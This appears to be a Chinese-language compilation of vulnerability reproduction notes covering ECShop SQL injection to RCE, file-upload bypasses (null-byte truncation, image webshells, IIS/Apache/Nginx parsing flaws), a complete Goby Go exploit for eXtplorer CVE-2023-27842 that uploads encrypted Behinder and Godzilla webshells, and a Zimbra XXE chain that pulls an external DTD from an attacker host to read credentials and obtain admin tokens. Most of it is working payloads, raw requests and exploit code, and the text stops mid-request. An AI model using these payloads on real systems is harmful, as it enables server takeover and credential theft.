ZmlsZV9wdXRfY29udGVudHMoJ2V2YWwucGhwJywnPD9waHAgZXZhbCgkX1BPU1RbY21kXSk7ID8+Jyk=

生成的Get WebShell Poc如下：

POC for ECShop 2.x:
554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:”num”;s:297:”/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a32563259577775634768774a79776e50443977614841675a585a686243676b58314250553152625932316b58536b374944382b4a796b3d2729293b2f2f7d787878,10– -“;s:2:”id”;s:11:”-1’ UNION/“;}554fcae493e564ee0dc75bdf2ebf94ca

POC for ECShop 3.x:
45ea207d7a2b68c49582d2d22adf953aads|a:2:{s:3:”num”;s:297:”/SELECT 1,0x2d312720554e494f4e2f2a,2,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a32563259577775634768774a79776e50443977614841675a585a686243676b58314250553152625932316b58536b374944382b4a796b3d2729293b2f2f7d787878,10– -“;s:2:”id”;s:11:”-1’ UNION/“;}45ea207d7a2b68c49582d2d22adf953a
1
2
3
4
5
套入POC利用，再用蚁剑即可连接，连接截图如下：

到此，Ecshop xianzhi-2017-02-82239600 Sql注入、远程代码执行漏洞结束。

ECShop 4.x collection_list SQL注入
影响范围
Ecshop 2.x

Ecshop 3.x-3.6.0

漏洞成因
可参考：https://mp.weixin.qq.com/s/xHioArEpoAqGlHJPfq3Jiw

漏洞利用
环境准备
名称 IP
攻击机 192.168.159.132
靶机 192.168.159.129
进入靶机的vulhub目录下，输入以下命令启动靶场：

cd ecshop/collection_list-sqli
docker-compose up -d
1
2
打开网站http://192.168.159.129:8080，出现安装界面，截图如下：

在安装过程中，数据库地址为mysql，用户名和密码均为root。

漏洞
首先注册一个测试用户test，然后登录后点击我的收藏，抓包如下图所示：

手动
POC：

X-Forwarded-Host: 45ea207d7a2b68c49582d2d22adf953auser_account|a:2:{s:7:”user_id”;s:38:”0’-(updatexml(1,repeat(user(),2),1))-‘“;s:7:”payment”;s:1:”4”;}|45ea207d7a2b68c49582d2d22adf953a
1
X-Forwarded-Host: 45ea207d7a2b68c49582d2d22adf953apay_log|s:44:”1’ and updatexml(1,repeat(user(),2),1) and ‘“;|
1
可以看到如下图所示：

00截断

参考https://blog.csdn.net/weixin_44840696/article/details/90581104

参考https://blog.csdn.net/qq_26090065/article/details/81458937

00截断原理

00截断是操作系统层的漏洞，由于操作系统是C语言或汇编语言编写的，这两种语言在定义字符串时，都是以\0（即0x00）作为字符串的结尾

0x00 是 ascii 为 0 的字符。而ascii中0作为特殊字符保留，表示字符串结束

00截断原理，为什么能做到00截断？

%00是url编码后的，实际上是构造ASCII码值的0，0x00是字符串的结束标识符，了解%00实际上我们要先了解0x00，0x00实际上是一个十六进制表示方法，实际上就是表示ASCII码值为0，
0x开头表示16进制，0在十六进制中是00, 0x00就是%00解码成的16进制

在url中%00表示ascll码中的0 ，而ascii中0作为特殊字符保留，表示字符串结束，所以当url中出现%00时就会认为读取已结束

00截断要求

php版本要小于5.3.4，5.3.4及以上已经修复该问题
magic_quotes_gpc需要为OFF状态

GET请求

upload-labs第十二关

看一下源代码

第八行有一个$_GET[‘save_path’]获取我们的参数，后面”/“.rand(10, 99).date(“YmdHis”).”.”.$file_ext;，就是我们添加文件的时间和文件后缀

第十行可以看见，直接用的第八行的路径进行保存

我们就可以用%00截断叫后面的”/“.rand(10, 99).date(“YmdHis”).”.”.$file_ext给去除掉

比如

我们上传的是a.php%00.png======就变成了a.php

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
    if(in_array($file_ext,$ext_arr)){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;

        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = '上传出错！';
        }
    } else{
        $msg = "只允许上传.jpg|.png|.gif类型文件！";
    }
}

上传一个文件phpinfo.png内容

1	<?php phpinfo(); ?>

修改文件的内容路径后面加上a.php%00

结果

POST请求

upload-labs第十三关

%00在get请求里面会自动解码

在post里面应为我的burp url的解码有毛病我们就可以用修改十六进制

看一下代码和第十二关一样就是一个是get请求一个是post请求

第八行有一个$_POST[‘save_path’]获取我们的参数，后面”/“.rand(10, 99).date(“YmdHis”).”.”.$file_ext;，就是我们添加文件的时间和文件后缀

第十行可以看见，直接用的第八行的路径进行保存

我们就可以用%00截断叫后面的”/“.rand(10, 99).date(“YmdHis”).”.”.$file_ext给去除掉

比如

我们上传的是a.php%00.png======就变成了a.php

$is_upload = false;
$msg = null;
if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_ext = substr($_FILES['upload_file']['name'],strrpos($_FILES['upload_file']['name'],".")+1);
    if(in_array($file_ext,$ext_arr)){
        $temp_file = $_FILES['upload_file']['tmp_name'];
        $img_path = $_POST['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;

        if(move_uploaded_file($temp_file,$img_path)){
            $is_upload = true;
        } else {
            $msg = "上传失败";
        }
    } else {
        $msg = "只允许上传.jpg|.png|.gif类型文件！";
    }
}

上传一个文件phpinfo.png内容

1	<?php phpinfo(); ?>

修改文件的内容路径后面加上a.php=，我加这个=是为了在修改十六进制好找

结果

图片马

将照片和webshell合成绕过

他会吧一个webshell的木马复制到照片里面，但是这个有一个问题就是当服务器解析照片的时候可能会受到照片的源码的内容应为webshell的运行

用copy命令

我们准备一个文件名叫phpinfo.php

内容

1	<?php echo phpinfo();?>

还有一个普通的照片名字zm9kpy.jpg

命令copy /a zm9kpy.jpg + /b phpinfo.php = a.jpg

/a 表示以ASCII方式打
/b 表示以二进制方式打开

照片顺序不要搞错了不然就叫webshell代码插到最前面了

可以看见生成出来一个a.jpg文件

编辑出来的照片有的可能查看不了

教程上是这样写的不容易看懂

照片还是可以打开的

查看照片文件的源代码

可以看见已经插入上面了

文件幻术头绕过

同照片的文件内容前几个自己都是相同的下面的16进制是在一个博客上https://blog.csdn.net/Kevinhanser/article/details/81613003找的

1
2
3

jpg=FF D8 FF E0 00 10 4A 46 49 46
gif=47 49 46 38 39 61
png = 89 50 4E 47

我用burp抓一个jpg的数据包看一下16进行的头

可以看见是相通的

修改数据包的内容绕过

有的过滤会检查文件内容每一个照片里面都有一个前面这个字段来代表文件类型
我们抓一个普通的照片上传文件的数据包

可以看见前面有一个PNG的字符串

upload-labs第十四关和第十五关

他俩都可以用下面这个方法绕过

上发一个phpinfo.php文件里面内容

1
2
3

<?php
echo phpinfo();
?>

上发的时候用burp抓包如果叫文件名，和类型给修改成png格式的发现还是发不上去

然后我们发一个png文件叫里面的文件给文件内容全部给改成webshell只留下照片的内容头的部分

上传一个普通照片文件

用burp进行抓包

然后我们叫里面改成webshell只留下照片的内容头的部分

放包就上发上去了

但是是执行不了的应为他是png文件，可以通过其他的漏洞进行执行比如解析漏洞

IIS6.0解析漏洞

环境win2003 iis6.0

IIS 6.0解析利用方法有两种

目录解析
文件解析

目录解析

假如你有一个*.asp的目录IIS6.0解析漏洞会吧*.asp的目录里面的文件全部当做asp来解析

演示

我在网站的目录创建一个a.asp的目录里面有一个abc.png的文件

abc.png的文件内容

1	<%response.write("Hello World!")%>

结果

文件解析

a.asp;.png在服务器那边;后面的内容就会被截断

演示

在网站跟目录创建一个a.asp;.png文件

访问

apache解析漏洞

低版本apache解析漏洞

这个原理就是apache在解析从右到左查看文件名，如果不认识，继续向左识别，知道认识这个文件类型

比如 abc.php.aaaa.qqqq

apache在解析不认识.qqqq，在向前解析.aaaa不认识在向前解析，.php这个认识，最终解析成php

演示上传一个a.php.qqq文件

Apache HTTPD 换行解析漏洞分析与

漏洞编号CVE-2017-15715

Apache在2.4.0-2.4.29版本中存在一个解析漏洞。程序在解析PHP时，如果文件名最后有一个换行符x0A，apache依然会将其当成php解析，但是在上传文件时可以成功的绕过黑名单

演示靶场环境vulhub进入/httpd/CVE-2017-15715

Nginx解析漏洞

低版本解析漏洞

这个我不知道是漏洞到那个版本

原因在于，Nginx拿到文件路径（更专业的说法是URI）/test.jpg/test.php 后，一看后缀是.php，便认为该文件是php文件，于是转交给php去处理。php一看 /test.jpg/test.php 不存在，便删去最后的/test.php，又看/test.jpg存在，便把/test.jpg当成要执行的文件了，又因为后缀为.jpg，php认为这不是php文件，

Nginx 文件名逻辑漏洞(CVE-2013-4547)

其影响版本为： Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7，范围较广

漏洞文章地址https://vulhub.org/#/environments/nginx/CVE-2013-4547/

进入/vulhub/nginx/CVE-2013-4547，启动靶场环境：docker-compose up -d

[0x20]是空格，[0x00]是\0，这两个字符都不需要编码

1	uploadfiles/1.gif[0x20][0x00].php

然后查看16进制进行修改

extplorer文件上传漏洞(CVE-2023-27842)

环境搭建

下载地址：https://extplorer.net/projects/extplorer/files

这边我下载的是2.1.7

解压到web文件里面

启动web服务，这个php版本是用的5多

复现

请求登录包

默认用户admin密码admin

POST /index.php HTTP/1.1
Host: 192.168.56.102
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 102
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate
Connection: close

option=com_extplorer&action=login&type=extplorer&username=admin&password=admin&lang=simplified_chinese

出现下面这个表示登录成功

登录成功后

访问根目录

然后上传webshell

POST /index.php HTTP/1.1
Host: 192.168.56.102
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 755
Content-Type: multipart/form-data; boundary=---------------------------374852334929431586552418693308
Cookie: eXtplorer=hjmvhlcbbkfh1fitjuqdgjpt72;
Accept-Encoding: gzip, deflate
Connection: close

-----------------------------374852334929431586552418693308
Content-Disposition: form-data; name="userfile[0]"; filename="7Ddec6.php"

<?php @error_reporting(0);echo "1f0A14BBbF";unlink(__FILE__);?>
-----------------------------374852334929431586552418693308
Content-Disposition: form-data; name="option"

com_extplorer
-----------------------------374852334929431586552418693308
Content-Disposition: form-data; name="action"

upload
-----------------------------374852334929431586552418693308
Content-Disposition: form-data; name="requestType"

xmlhttprequest
-----------------------------374852334929431586552418693308
Content-Disposition: form-data; name="confirm"

true
-----------------------------374852334929431586552418693308--

看一下执行上传成功

然后服务这个上传的php文件，上传成功

注意点

新点的版本有上传校验码

这个校验码可以在这个地方获取

GET /index.php?option=com_extplorer&action=include_javascript&file=functions.js HTTP/1.1
Host: 192.168.56.102
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Cookie: eXtplorer=3pmjltuodtfr748derg2k7g59k;
Accept-Encoding: gzip, deflate
Connection: close

完成的go代码

package exploits

import (
	"git.gobies.org/goby/goscanner/goutils"
	"git.gobies.org/goby/goscanner/jsonvul"
	"git.gobies.org/goby/goscanner/scanconfig"
	"git.gobies.org/goby/httpclient"
	"regexp"
	"strings"
)

func init() {
	expJson := `{
  "Name": "extplorer 平台 index.php 文件上传漏洞（CVE-2023-27842）",
  "Description": "<p>eXtplorer是一款基于php应用的文件管理器，通过web页面进行操作，对文件和目录进行编辑、复制、移动和删除等操作，甚至还能修改文件的权限属性。</p><p>攻击者可以利用默认用户admin默认密码admin，后台文件上传漏洞执行恶意代码、写入后门、读取敏感文件，从而可能导致服务器受到攻击并被控制。</p>",
  "Product": "eXtplorer",
  "Homepage": "http://extplorer.net/",
  "DisclosureDate": "2023-03-05",
  "Author": "sunying",
  "FofaQuery": "app=\"eXtplorer\"",
  "GobyQuery": "app=\"eXtplorer\"",
  "Level": "2",
  "Impact": "<p>攻击者可以利用默认用户admin默认密码admin，后台文件上传漏洞执行恶意代码、写入后门、读取敏感文件，从而可能导致服务器受到攻击并被控制。<br></p>",
  "Recommendation": "<p>1、修改默认口令，密码最好包含大小写字母、数字和特殊字符等，且位数大于8位。<br></p><p>2、如非必要，禁止公网访问该系统。<br></p><p>3、通过防火墙等安全设备设置访问策略，设置白名单访问。<br></p>",
  "References": [
    "https://github.com/tristao-marinho/CVE-2023-27842"
  ],
  "Is0day": false,
  "HasExp": true,
  "ExpParams": [
    {
      "name": "attackType",
      "type": "select",
      "value": "behinder,godzilla,custom",
      "show": ""
    },
    {
      "name": "content",
      "type": "input",
      "value": "<?php echo \"Hello, world!\"; ?>",
      "show": "attackType=custom"
    }
  ],
  "ExpTips": {
    "Type": "",
    "Content": ""
  },
  "ScanSteps": [
    "AND",
    {
      "Request": {
        "method": "GET",
        "uri": "/",
        "follow_redirect": false,
        "header": {},
        "data_type": "text",
        "data": ""
      },
      "ResponseTest": {
        "type": "group",
        "operation": "AND",
        "checks": []
      },
      "SetVariable": []
    }
  ],
  "ExploitSteps": [
    "AND",
    {
      "Request": {
        "method": "GET",
        "uri": "/",
        "follow_redirect": false,
        "header": {},
        "data_type": "text",
        "data": ""
      },
      "ResponseTest": {
        "type": "group",
        "operation": "AND",
        "checks": []
      },
      "SetVariable": []
    }
  ],
  "Tags": [
    "文件上传"
  ],
  "VulType": [
    "文件上传"
  ],
  "CVEIDs": [
    "CVE-2023-27842"
  ],
  "CNNVD": [
    "CNNVD-202303-1623"
  ],
  "CNVD": [
    ""
  ],
  "CVSSScore": "8.5",
  "Translation": {
    "CN": {
      "Name": "extplorer 平台 index.php 文件上传漏洞（CVE-2023-27842）",
      "Product": "eXtplorer",
      "Description": "<p>eXtplorer是一款基于php应用的文件管理器，通过web页面进行操作，对文件和目录进行编辑、复制、移动和删除等操作，甚至还能修改文件的权限属性。</p><p>攻击者可以利用默认用户admin默认密码admin，后台文件上传漏洞执行恶意代码、写入后门、读取敏感文件，从而可能导致服务器受到攻击并被控制。</p>",
      "Recommendation": "<p>1、修改默认口令，密码最好包含大小写字母、数字和特殊字符等，且位数大于8位。<br></p><p>2、如非必要，禁止公网访问该系统。<br></p><p>3、通过防火墙等安全设备设置访问策略，设置白名单访问。<br></p>",
      "Impact": "<p>攻击者可以利用默认用户admin默认密码admin，后台文件上传漏洞执行恶意代码、写入后门、读取敏感文件，从而可能导致服务器受到攻击并被控制。<br></p>",
      "VulType": [
        "文件上传"
      ],
      "Tags": [
        "文件上传"
      ]
    },
    "EN": {
      "Name": "extplorer index.php File Upload Vulnerability(CVE-2023-27842)",
      "Product": "eXtplorer",
      "Description": "<p>EXtplorer is a file manager based on PHP applications, which operates through web pages to edit, copy, move, delete files and directories, and even modify file permission properties.</p><p>Attackers can exploit the default user admin, default password admin, and backend file upload vulnerabilities to execute malicious code, write backdoors, and read sensitive files, which may lead to server attacks and control.</p>",
      "Recommendation": "<p>1. Change the default password, which should preferably include uppercase and lowercase letters, numbers, and special characters, with more than 8 digits.</p><p>2. If not necessary, prohibit public network access to the system.</p><p>3. Set access policies and whitelist access through security devices such as firewalls.</p>",
      "Impact": "<p>Attackers can exploit the default user admin, default password admin, and backend file upload vulnerabilities to execute malicious code, write backdoors, and read sensitive files, which may lead to server attacks and control.<br></p>",
      "VulType": [
        "File Upload"
      ],
      "Tags": [
        "File Upload"
      ]
    }
  },
  "AttackSurfaces": {
    "Application": null,
    "Support": null,
    "Service": null,
    "System": null,
    "Hardware": null
  }
}`
	obtainUploadTokenda312sdasda := func(hostInfo *httpclient.FixUrl, cookie string) (*httpclient.HttpResponse, error) {
		sendConfig := httpclient.NewGetRequestConfig("/index.php?option=com_extplorer&action=include_javascript&file=functions.js")
		sendConfig.VerifyTls = false
		sendConfig.FollowRedirect = false
		sendConfig.Header.Store("Cookie", cookie)
		return httpclient.DoHttpRequest(hostInfo, sendConfig)
	}

	uploadVerificationdsad321321asd := func(hostInfo *httpclient.FixUrl, route string, content string) (*httpclient.HttpResponse, error) {
		sendConfig := httpclient.NewGetRequestConfig("/" + route)
		sendConfig.VerifyTls = false
		sendConfig.FollowRedirect = false
		return httpclient.DoHttpRequest(hostInfo, sendConfig)
	}
	uploadFilesdsad31290as := func(hostInfo *httpclient.FixUrl, route string, content string, cookie string, token string) (*httpclient.HttpResponse, error) {
		sendConfig := httpclient.NewPostRequestConfig("/index.php")
		sendConfig.VerifyTls = false
		sendConfig.FollowRedirect = false
		sendConfig.Header.Store("Cookie", cookie)
		sendConfig.Header.Store("Content-Type", "multipart/form-data; boundary=---------------------------106849294727430498781818238545")
		sendConfig.Data += "-----------------------------106849294727430498781818238545\r\nContent-Disposition: form-data; name=\"userfile[0]\"; filename=\"" + route + "\"\r\nContent-Type: application/x-php\r\n\r\n" + content + "\r\n-----------------------------106849294727430498781818238545\r\nContent-Disposition: form-data; name=\"overwrite_files\"\r\n\r\non\r\n-----------------------------106849294727430498781818238545\r\nContent-Disposition: form-data; name=\"option\"\r\n\r\ncom_extplorer\r\n-----------------------------106849294727430498781818238545\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nupload\r\n-----------------------------106849294727430498781818238545\r\nContent-Disposition: form-data; name=\"dir\"\r\n\r\n/\r\n-----------------------------106849294727430498781818238545\r\nContent-Disposition: form-data; name=\"requestType\"\r\n\r\nxmlhttprequest\r\n-----------------------------106849294727430498781818238545\r\nContent-Disposition: form-data; name=\"confirm\"\r\n\r\ntrue\r\n-----------------------------106849294727430498781818238545\r\nContent-Disposition: form-data; name=\"token\"\r\n\r\n" + token + "\r\n-----------------------------106849294727430498781818238545--\r\n"
		return httpclient.DoHttpRequest(hostInfo, sendConfig)
	}
	validateLogon3das213 := func(hostInfo *httpclient.FixUrl) (*httpclient.HttpResponse, error) {
		sendConfig := httpclient.NewPostRequestConfig("/index.php")
		sendConfig.VerifyTls = false
		sendConfig.FollowRedirect = false
		sendConfig.Header.Store("Content-Type", "application/x-www-form-urlencoded; charset=UTF-8")
		sendConfig.Header.Store("X-Requested-With", "XMLHttpRequest")
		sendConfig.Data = "option=com_extplorer&action=login&type=extplorer&username=admin&password=admin&lang=simplified_chinese"
		return httpclient.DoHttpRequest(hostInfo, sendConfig)
	}
	ExpManager.AddExploit(NewExploit(
		goutils.GetFileName(),
		expJson,
		func(exp *jsonvul.JsonVul, hostinfo *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {
			fileName := goutils.RandomHexString(10) + ".php"
			content := goutils.RandomHexString(10)
			if successfullyVerifiedLogin, err := validateLogon3das213(hostinfo); err == nil && successfullyVerifiedLogin.StatusCode == 200 && strings.Contains(successfullyVerifiedLogin.RawBody, "'success':true") {
				if uploadToken, err := obtainUploadTokenda312sdasda(hostinfo, successfullyVerifiedLogin.Cookie); err == nil {
					Token := regexp.MustCompile(`token:\s*"([^"]+)"`).FindStringSubmatch(uploadToken.Utf8Html)
					if len(Token) < 2 {
						Token = []string{"", goutils.RandomHexString(32)}
					}
					fileUpload, err := uploadFilesdsad31290as(hostinfo, fileName, "<?php @error_reporting(0);echo \""+content+"\";unlink(__FILE__);?>", successfullyVerifiedLogin.Cookie, Token[1])
					if err == nil && strings.Contains(fileUpload.RawBody, "'success':true") {
						uploadResults, err := uploadVerificationdsad321321asd(hostinfo, fileName, content)
						return err == nil && strings.Contains(uploadResults.RawBody, content)
					}
				}

			}
			return false
		},
		func(expResult *jsonvul.ExploitResult, stepLogs *scanconfig.SingleScanConfig) *jsonvul.ExploitResult {
			attackType := goutils.B2S(stepLogs.Params["attackType"])
			var content string
			if attackType == "behinder" {
				// /*该密钥为连接密码32位md5值的前16位，默认连接密码rebeyond*/
				content = `<?php @error_reporting(0);session_start();$key="e45e329feb5d925b";$_SESSION['k']=$key;session_write_close();$post=file_get_contents("php://input");if(!extension_loaded('openssl')){$t="base64_"."decode";$post=$t($post."");for($i=0;$i<strlen($post);$i++){$post[$i]=$post[$i]^$key[$i+1&15];}}else{$post=openssl_decrypt($post,"AES128",$key);}$arr=explode('|',$post);$func=$arr[0];$params=$arr[1];class C{public function __invoke($p){eval($p."");}}@call_user_func(new C(),$params);echo "e165421110ba03099a1c0393373c5b43";?>`
			} else if attackType == "godzilla" {
				// 哥斯拉 pass key
				content = `<?php @session_start();@set_time_limit(0);@error_reporting(0);function encode($D,$K){for($i=0;$i<strlen($D);$i++){$c=$K[$i+1&15];$D[$i]=$D[$i]^$c;}return $D;}$pass='pass';$payloadName='payload';$key='3c6e0b8a9c15224a';if(isset($_POST[$pass])){$data=encode(base64_decode($_POST[$pass]),$key);if(isset($_SESSION[$payloadName])){$payload=encode($_SESSION[$payloadName],$key);if(strpos($payload,"getBasicsInfo")===false){$payload=encode($payload,$key);}eval($payload);echo substr(md5($pass.$key),0,16);echo base64_encode(encode(@run($data),$key));echo substr(md5($pass.$key),16);}else{if(strpos($data,"getBasicsInfo")!==false){$_SESSION[$payloadName]=encode($data,$key);}}}echo "e165421110ba03099a1c0393373c5b43";?>`
			} else if attackType == "custom" {
				content = goutils.B2S(stepLogs.Params["content"])
			} else {
				expResult.Output = `未知的利用方式`
				return expResult
			}
			successfullyVerifiedLogin, err := validateLogon3das213(expResult.HostInfo)
			if err != nil {
				expResult.Output = err.Error()
			} else if successfullyVerifiedLogin.StatusCode == 200 && strings.Contains(successfullyVerifiedLogin.RawBody, "'success':true") {
				fileName := goutils.RandomHexString(10) + ".php"
				uploadToken, err := obtainUploadTokenda312sdasda(expResult.HostInfo, successfullyVerifiedLogin.Cookie)
				if err != nil {
					expResult.Output = err.Error()
					return expResult
				}
				Token := regexp.MustCompile(`token:\s*"([^"]+)"`).FindStringSubmatch(uploadToken.Utf8Html)
				if len(Token) < 2 {
					Token = []string{"", goutils.RandomHexString(32)}
				}
				fileUpload, err := uploadFilesdsad31290as(expResult.HostInfo, fileName, content, successfullyVerifiedLogin.Cookie, Token[1])
				if err != nil {
					expResult.Output = err.Error()
				} else if err == nil && strings.Contains(fileUpload.RawBody, "'success':true") {
					if uploadResults, err := uploadVerificationdsad321321asd(expResult.HostInfo, fileName, content); err == nil && (strings.Contains(uploadResults.RawBody, "e165421110ba03099a1c0393373c5b43") || attackType == "custom") && uploadResults.StatusCode == 200 {
						expResult.Success = true
						expResult.Output = "WebShell URL: " + expResult.HostInfo.FixedHostInfo + "/" + fileName + "\n"
						if attackType == "behinder" {
							expResult.Output += "Password: rebeyond\n"
							expResult.Output += "WebShell tool: Behinder v3.0\n"
						} else if attackType == "godzilla" {
							expResult.Output += "Password: pass 加密器：PHP_XOR_BASE64\n"
							expResult.Output += "WebShell tool: Godzilla v4.1\n"
						}
						expResult.Output += "Webshell type: php"
					} else {
						expResult.Output = err.Error()
					}
				} else {
					expResult.Output = `漏洞利用失败`
				}
			} else {
				expResult.Output = `漏洞利用失败`
			}
			return expResult
		},
	))
}

漏洞号CVD-2023-2190

zimbra任意文件读取漏洞CVE-2019-9670到RCE

文件读取

POST /Autodiscover/Autodiscover.xml HTTP/1.1
Host: xxxxxx.com
Cookie: ZM_TEST=true; ZA_SKIN=serenity
Content-Type: application/xml
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 307
Accept-Encoding: gzip, deflate
Connection: close

<!DOCTYPE xxe [<!ELEMENT name ANY ><!ENTITY xxe SYSTEM "file:///etc/passwd" >]><Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a"><Request><EMailAddress>aaaaa</EMailAddress><AcceptableResponseSchema>&xxe;</AcceptableResponseSchema></Request></Autodiscover>

读取密码

由于localconfig.xml为XML文件，需要加上CDATA标签才能作为文本读取，由于XXE不能内部实体进行拼接，所以此处需要使用外部dtd

外带实体内容

<!ENTITY % file SYSTEM "file:../conf/localconfig.xml">
<!ENTITY % start "<![CDATA[">
<!ENTITY % end "]]>">
<!ENTITY % all "<!ENTITY fileContents '%start;%file;%end;'>">

接着再次使用刚刚的包请求XML来进行XXE攻击。

<!DOCTYPE Autodiscover [
        <!ENTITY % dtd SYSTEM "http://地址/dtd">
        %dtd;
        %all;
        ]>
<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a">
    <Request>
        <EMailAddress>aaaaa</EMailAddress>
        <AcceptableResponseSchema>&fileContents;</AcceptableResponseSchema>
    </Request>
</Autodiscover>

请求

POST /Autodiscover/Autodiscover.xml HTTP/1.1
Host: 172.16.30.39:7071
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 331
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: application/xml
Cookie: ZM_TEST=true;ZA_SKIN=serenity;
Accept-Encoding: gzip, deflate
Connection: close

<!DOCTYPE Autodiscover [<!ENTITY % dtd SYSTEM "http://172.16.30.44:8000/demo.dtd">%dtd;%all;]><Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a"><Request><EMailAddress>aaaaa</EMailAddress><AcceptableResponseSchema>&fileContents;</AcceptableResponseSchema></Request></Autodiscover>

请求

脚本的正则代码匹配出来

1	passwd := regexp.MustCompile("<key name=\"ldap_amavis_password\">\\n <value>(.*)</value>").FindStringSubmatch(modifiedString)

通过密码获取低权限

通过上面获取的密码获取低权限的Cookie

POST /service/admin/soap HTTP/1.1
Host: 172.16.30.39:7071
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 452
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: application/xml
Cookie: ZM_TEST=true;ZA_SKIN=serenity;
Accept-Encoding: gzip, deflate
Connection: close

<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
   <soap:Header>
       <context xmlns="urn:zimbra">
           <userAgent name="ZimbraWebClient - SAF3 (Win)" version="5.0.15_GA_2851.RHEL5_64"/>
       </context>
   </soap:Header>
   <soap:Body>
     <AuthRequest xmlns="urn:zimbraAccount">
        <account by="adminName">zimbra</account>
        <password>479ADPOKv</password>
     </AuthRequest>
   </soap:Body>
</soap:Envelope>

通过低权限获取高权

通过上面获取的低权限获取高权的Cookie

POST /service/admin/soap HTTP/1.1
Host: 172.16.30.39:7071
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 450
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: application/xml
Cookie: ZM_ADMIN_AUTH_TOKEN=0_73a3f65da91ca050f92c075b242f7934c03fd2aa_69643d33363a65306661666438392d313336302d313164392d383636312d3030306139356439386566323b6578703d31333a313730313234353737333838333b747970653d363a7a696d6272613b7469643d31303a313036393033393138343b
Accept-Encoding: gzip, deflate
Connection: close

<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
   <soap:Header>
       <context xmlns="urn:zimbra">
           <userAgent name="ZimbraWebClient - SAF3 (Win)" version="5.0.15_GA_2851.RHEL5_64"/>
       </context>
   </soap:Header>
   <soap:Body>
     <AuthRequest xmlns="urn:zimbraAdmin">
        <account by="adminName">zimbra</account>
        <password>479ADPOKv</password>
     </AuthRequest>
   </soap:Body>
</soap:Envelope>

请求

通过密码直接获取高权限

直接通过密码获取搞权限不需要低权限的Cookie

POST /service/admin/soap HTTP/1.1
Host: 172.16.30.39:7071
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 450
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Content-Type: application/xml
Cookie: ZM_TEST=true;ZA_SKIN=serenity;
Accept-Encoding: gzip, deflate
Connection: close

<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
   <soap:Header>
       <context xmlns="urn:zimbra">
           <userAgent name="ZimbraWebClient - SAF3 (Win)" version="5.0.15_GA_2851.RHEL5_64"/>
       </context>
   </soap:Header>
   <soap:Body>
     <AuthRequest xmlns="urn:zimbraAdmin">
        <account by="adminName">zimbra</account>
        <password>479ADPOKv</password>
     </AuthRequest>
   </soap:Body>
</soap:Envelope>

请求

通过SSRF

TongdaOAactioncrawler.php文件上传漏洞

复现

上传POC

POST /module/ueditor/php/action_crawler.php HTTP/1.1
Host: 47.88.168.12:82
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 269
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Connection: close

